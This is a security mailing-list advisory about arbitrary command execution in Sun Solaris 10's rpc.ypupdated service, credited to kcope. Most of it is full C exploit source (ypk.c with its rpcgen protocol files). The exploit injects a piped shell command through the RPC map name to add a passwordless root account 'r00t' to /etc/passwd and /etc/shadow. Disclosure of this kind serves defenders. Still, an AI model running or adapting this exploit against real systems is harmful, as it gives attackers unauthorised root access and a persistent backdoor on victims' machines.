The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit)
------------------------------------------------------------------------
SUMMARY
Insufficient filtering done on user provided input by the rpc.ypupdated
RPC process under the Sun Solaris operating system allows remote attackers
to cause the process to execute arbitrary commands.
DETAILS
Vulnerable Systems:
* Sun Solaris 10
Exploit:
ypk.c:
/*update: kcope/year2008/tested on SunOS 5.10//
KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES)
If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV)
it executes a shell through which extra commands may be launched
on the remote host by passing '|shell command'.
i.e. the COMM variable contains a pipe character after which a
command may be passed. You may change the command by changing this.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <rpc/rpc.h>
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
typedef struct{
unsigned int yp_buf_len;
char * yp_buf_val;
} yp_buf;
struct ypupdate_args{
char * mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#else
bool_t xdr_ypupdate_args();
#endif
void main(argc, argv)
int argc;
char *argv[];
{
CLIENT * cli;
unsigned long prog=100028;
unsigned int vers=1;
struct sockaddr_in skn;
struct timeval timeVal;
struct hostent * hostEnt;
ypupdate_args ypArg;
unsigned long rtnval;
unsigned int desc;
char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >>
/etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;";
if(argc<2) {
printf("example: yxp target\n");
exit(1);
}
timeVal.tv_usec=0;
timeVal.tv_sec=15;
desc=RPC_ANYSOCK;
ypArg.datum.yp_buf_val="x";
ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;
ypArg.key.yp_buf_val="x";
ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;
ypArg.mapname=comm;
if ((hostEnt=gethostbyname(argv[1]))==NULL){
printf("gethostbyname failure\n");
exit(1);
}
skn.sin_family=AF_INET;skn.sin_port=htons(0);
bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);
if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){
printf("clntudp_create failure\n");
exit(1);
}
cli->cl_auth=authunix_create("localhost",0,0,0,0);
clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal);
}
ypupdate_prot.h:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#ifndef _YPUPDATE_PROT_H_RPCGEN
#define _YPUPDATE_PROT_H_RPCGEN
#include <rpc/rpc.h>
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
typedef struct {
u_int yp_buf_len;
char *yp_buf_val;
} yp_buf;
#ifdef __cplusplus
extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*);
#elif __STDC__
extern bool_t xdr_yp_buf(XDR *, yp_buf*);
#else /* Old Style C */
bool_t xdr_yp_buf();
#endif /* Old Style C */
struct ypupdate_args {
char *mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#else /* Old Style C */
bool_t xdr_ypupdate_args();
#endif /* Old Style C */
struct ypdelete_args {
char *mapname;
yp_buf key;
};
typedef struct ypdelete_args ypdelete_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#elif __STDC__
extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#else /* Old Style C */
bool_t xdr_ypdelete_args();
#endif /* Old Style C */
#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)
#ifdef __cplusplus
#define YPU_CHANGE ((u_long)1)
extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#elif __STDC__
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#else /* Old Style C */
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1();
extern u_int * ypu_change_1_svc();
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1();
extern u_int * ypu_insert_1_svc();
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1();
extern u_int * ypu_delete_1_svc();
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1();
extern u_int * ypu_store_1_svc();
#endif /* Old Style C */
#endif /* !_YPUPDATE_PROT_H_RPCGEN */
ypupdate_prot_xdr.c:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#include "ypupdate_prot.h"
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
bool_t
xdr_yp_buf(XDR *xdrs, yp_buf *objp)
{
register long *buf;
if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int
*)&objp->yp_buf_len, MAXYPDATALEN)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp)
{
register long *buf;
if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->key)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->datum)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp)
{
register long *buf;
if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->key)) {
return (FALSE);
}
return (TRUE);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:kingcope@gmx.net> kcope.
The original article can be found at:
<http://www.milw0rm.com/exploits/5282>
http://www.milw0rm.com/exploits/5282
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
